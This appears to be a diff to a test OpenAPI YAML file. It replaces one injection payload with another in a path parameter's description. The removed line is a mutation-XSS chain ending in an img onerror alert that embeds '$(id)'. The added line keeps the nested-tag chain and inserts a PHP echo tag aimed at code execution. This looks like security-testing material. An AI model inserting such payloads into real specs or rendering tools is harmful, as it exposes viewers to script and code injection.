--- a/test2.yaml
+++ b/test2.yaml
@@ -28,7 +28,7 @@ paths:
     delete:
       parameters:
         - description: |
-            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('$(id)') src=1>"></form>
+            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><?php echo "Stored XSS is sexy but I really <3 RCE"; ?>"></form>
 
           format: int64
           in: path
